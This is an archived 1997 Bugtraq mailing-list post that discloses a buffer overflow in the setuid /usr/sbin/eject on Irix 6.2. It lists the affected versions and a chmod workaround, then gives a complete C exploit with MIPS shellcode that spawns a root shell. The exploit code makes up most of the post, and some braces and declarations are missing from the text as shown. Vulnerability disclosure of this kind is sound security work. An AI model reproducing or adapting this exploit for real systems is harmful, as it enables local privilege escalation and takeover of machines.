Bugtraq mailing list archives

Irix buffer overflow in /usr/sbin/eject

From: hedley () CS BRIS AC UK (David Hedley)
Date: Sun, 25 May 1997 17:32:50 +0100

Hi there again,

Following on from Yuri's email about buffer overflowing on Irix, I
include an exploit for /usr/sbin/eject. As mentioned previously, we
smash $gp instead of $ra and so the exploit is slightly different to the
last exploit for /bin/df...

Vulnerable: Irix 6.2 (possibly 6.1 and 6.0.1 also - I haven't tested them)

Not vulnerable: Irix 5.x - buffer overflow exists, but is virtually
                           unexploitable due to the stack position.
                Irix 6.3 - appears to have been fixed.

Impact: local users can gain root privileges

Tested on: Power Challenge (R8000) Irix64 6.2

Temporary fix: chmod u-s /usr/sbin/eject



p.s. Yuri's exploit for /usr/bsd/ordist works on our R8000 PChallenge
     (Irix64 6.2)
p.p.s. Can the administrator of bugtraq (and best-of-security) please
     include an 'Errors-to:' or similar field in outgoing mail so
     bounces from the list don't come back to the original sender?

 David Hedley (hedley () cs bris ac uk)
 finger hedley () cs bris ac uk for PGP key
 Computer Graphics Group | University of Bristol | UK

-------------------- cut here -------------------------------

/* /usr/sbin/eject exploit by DCRH 25/5/97
 * Tested on: R8000 Power Challenge (Irix64 6.2)
 * Exploit doesn't work on Irix 5.x due to stack position
 * Irix 6.3 does not appear to be vulnerable
 * compile as: cc -n32 eject.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define NUM_ADDRESSES   80
#define BUF_LENGTH      400
#define EXTRA           200
#define OFFSET          -0x128
#define GP_OFFSET       32412
#define IRIX_NOP        0x03e0f825    /* move $ra,$ra */

#define u_long unsigned

u_long get_sp_code[] = {
    0x03a01025,         /* move $v0,$sp         */
    0x03e00008,         /* jr $ra               */
    0x00000000,         /* nop                  */

u_long irix_shellcode[] = {
    0x24041234,         /* li $4,0x1234         */
    0x2084edcc,         /* sub $4,0x1234        */
    0x0491fffe,         /* bgezal $4,pc-4       */
    0x03bd302a,         /* sgt $6,$sp,$sp       */
    0x23e4012c,         /* addi $4,$31,264+36   */
    0xa086feff,         /* sb $6,-264+7($4)     */
    0x2084fef8,         /* sub $4,264           */
    0x20850110,         /* addi $5,$4,264+8     */
    0xaca4fef8,         /* sw $4,-264($5)       */
    0xaca6fefc,         /* sw $4,-260($5)       */
    0x20a5fef8,         /* sub $5, 264          */
    0x240203f3,         /* li $v0,1011          */
    0x03ffffcc,         /* syscall 0xfffff      */
    0x2f62696e,         /* "/bin"               */
    0x2f7368ff,         /* "/sh"                */


void main(int argc, char **argv)
    char *env[] = {NULL};
    u_long targ_addr, stack;
    u_long *long_p;
    int i, code_length = strlen((char *)irix_shellcode)+1;
    u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;

    stack = get_sp();

    if (stack & 0x80000000) {
        printf("Recompile with the '-n32' option\n");

    long_p =(u_long *)  buf;
    targ_addr = stack + OFFSET;

    if (argc > 1)
      targ_addr += atoi(argv[1]) * 4;

    if (targ_addr + GP_OFFSET > 0x80000000) {
        printf("Sorry - this exploit for Irix 6.x only\n");

    while ((targ_addr & 0xff000000) == 0 ||
           (targ_addr & 0x00ff0000) == 0 ||
           (targ_addr & 0x0000ff00) == 0 ||
           (targ_addr & 0x000000ff) == 0)
      targ_addr += 4;

    for (i = 0; i < NUM_ADDRESSES/sizeof(u_long); i++)
        *long_p++ = targ_addr + NUM_ADDRESSES/2;

    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
        *long_p++ = IRIX_NOP;

    for (i = 0; i < code_length/sizeof(u_long); i++)
        *long_p++ = irix_shellcode[i];

    for (i = 0; i < EXTRA / sizeof(u_long); i++)
        *long_p++ = targ_addr + GP_OFFSET;

    *long_p = 0;

    printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);

    execle("/usr/sbin/eject", "eject", buf, 0, env);
    perror("execl failed");

Current thread: